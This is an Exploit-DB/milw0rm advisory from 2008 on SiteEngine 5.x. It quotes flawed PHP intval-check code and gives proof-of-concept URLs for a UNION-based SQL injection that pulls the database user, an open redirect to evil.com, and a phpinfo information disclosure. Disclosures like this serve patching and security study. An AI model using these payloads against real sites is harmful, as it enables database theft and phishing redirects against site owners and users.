SiteEngine 5.x - Multiple Vulnerabilities

EDB-ID:

6823


Author:

xy7

Type:

webapps


Platform:

PHP

Date:

2008-10-23


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

SiteEngine 5.x Multiple Remote Vulnerabilities
Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.

-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";

POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability exist in board.php too……

-=0x02=- URI Redirection Vulnerability
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com

-=0x03=- Information Disclosure Vulnerability
POC:
http://www.test.com/misc.php?action=php_info

ForFun~

-=EOF=-

# milw0rm.com [2008-10-23]